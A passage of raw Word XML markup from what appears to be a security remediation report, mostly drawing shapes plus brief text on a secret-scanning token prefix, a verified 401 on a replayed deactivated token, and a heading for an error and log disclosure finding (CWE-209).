      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a user who suspects compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B76AA0" w14:textId="5AA871EF"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4544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17D481F4" wp14:editId="4E8A1DBE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-276908</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="742950" cy="400050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26571" name="Group 26571"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="742950" cy="400050"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="742950" cy="400050"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1374" name="Shape 1374"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6890"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135973"/>
                                  <a:pt x="580095" y="138212"/>
                                  <a:pt x="578235" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141932"/>
                                  <a:pt x="574130" y="142863"/>
                                  <a:pt x="571500" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>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381" name="Shape 1381"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="104775" y="266700"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4651"/>
                                  <a:pt x="638175" y="6890"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126448"/>
                                  <a:pt x="637245" y="128687"/>
                                  <a:pt x="635385" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="132407"/>
                                  <a:pt x="631280" y="133338"/>
                                  <a:pt x="628650"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993F09C" id="Group 26571" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-21.8pt;width:58.5pt;height:31.5pt;z-index:-251431936" coordsize="7429,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&#10;APMAAADqBwAAAAA=&#10;">
                <v:shape id="Shape 1374" o:spid="_x0000_s1027" style="position:absolute;width:5810;height:1428;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ylbxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFLwUzdaK2tUoKgiFHnyDx+lm3Ec3kyVJdfvvm0LB23x8z5nOW1OLKzlfWlbw0ktAEGdW&#10;l5wrOB7W3TEIH5A11pZJwQ95mM8eH6aYanvjHV33IRcxhH2KCooQmlRKnxVk0PdsQxy5i3UGQ4Qu&#10;l9rhLYabWvaTZCgNlhwbCmxoVVD2tf82Cg670+dguzlX1dv2eeGq5Wb9wVKpzlO7mIAI1Ia7+N/9&#10;ruP819EA/r6JJ8jZLwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCpHylbxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l571500,v2630,,4875,930,6735,2778c580095,4638,581025,6890,581025,9525r,123825c581025,135973,580095,138212,578235,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803l,133350,,9525,2790,2778c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,581025,142875"/>
                </v:shape>
                <v:shape id="Shape 1381" o:spid="_x0000_s1028" style="position:absolute;left:1047;top:2667;width:6382;height:1333;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S3jwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4L/ocwC3vT1AdSukYRQfEiuD7uYzPblG0mJYna/fdGWPA2H99z5svONuJOPtSOFYyGGQji0uma&#10;KwXn02aQgwgRWWPjmBT8UYDlot+bY6Hdg7/pfoyVSCEcClRgYmwLKUNpyGIYupY4cT/OW4wJ+kpq&#10;j48Ubhs5zrKZtFhzajDY0tpQ+Xu8WQXZbnvVtLlMT6tp8CYfu9v+4JT6/OhWXyAidfEt/nfvdJo/&#10;yUfw+iadIBdPAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADrlLePBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m9525,l628650,v2630,,4875,930,6735,2791c637245,4651,638175,6890,638175,9525r,114300c638175,126448,637245,128687,635385,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,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5568" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23A3F364" wp14:editId="63BD1659">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1580257</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>161241</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26574" name="Group 26574"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="285750" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1385" name="Shape 1385"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4638"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126454"/>
                                  <a:pt x="284820" y="128699"/>
                                  <a:pt x="282960" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132420"/>
                                  <a:pt x="278855" y="133350"/>
                                  <a:pt x="276225"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A0EECB2" id="Group 26574" o:spid="_x0000_s1026" style="position:absolute;margin-left:124.45pt;margin-top:12.7pt;width:22.5pt;height:10.5pt;z-index:-251430912" coordsize="2857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&#10;">
                <v:shape id="Shape 1385" o:spid="_x0000_s1027" style="position:absolute;width:285750;height:133350;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="285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5SwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4L+x/CLHjTdC2KdI0iwuJ6UHzeh2a2LTaTkmRt/fdGELzNx/ec2aIztbiR85VlBV/DBARxbnXF&#10;hYLz6WcwBeEDssbaMim4k4fF/KM3w0zblg90O4ZCxBD2GSooQ2gyKX1ekkE/tA1x5P6sMxgidIXU&#10;DtsYbmo5SpKJNFhxbCixoVVJ+fX4bxTotkjD2u0ufNDnzW5b3/epXinV/+yW3yACdeEtfrl/dZyf&#10;Tsfw/CaeIOcPAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKxGnlLBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m9525,l276225,v2630,,4875,930,6735,2778c284820,4638,285750,6890,285750,9525r,114300c285750,126454,284820,128699,282960,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pubudupos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> token prefix was added so GitHub's secret scanning can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>recognise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a leaked </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>token  relevant</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a project that had already committed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>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
    <w:p w14:paraId="7282354B" w14:textId="22537A4B" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="106"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Verified</w:t>
      </w:r>
      <w:r w:rsidR="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> replayed after deactivation → </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DF47D5" w14:textId="77777777" w:rsidR="00287B7F" w:rsidRDefault="00287B7F" w:rsidP="00CA733A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="5278"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD510D9" w14:textId="15BAB5DB" w:rsidR="001244A6" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="5278"/>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V-07 · Error, source and log disclosure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE0EA1" w14:textId="157D6542" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="5278"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A05:2021 · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-209</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
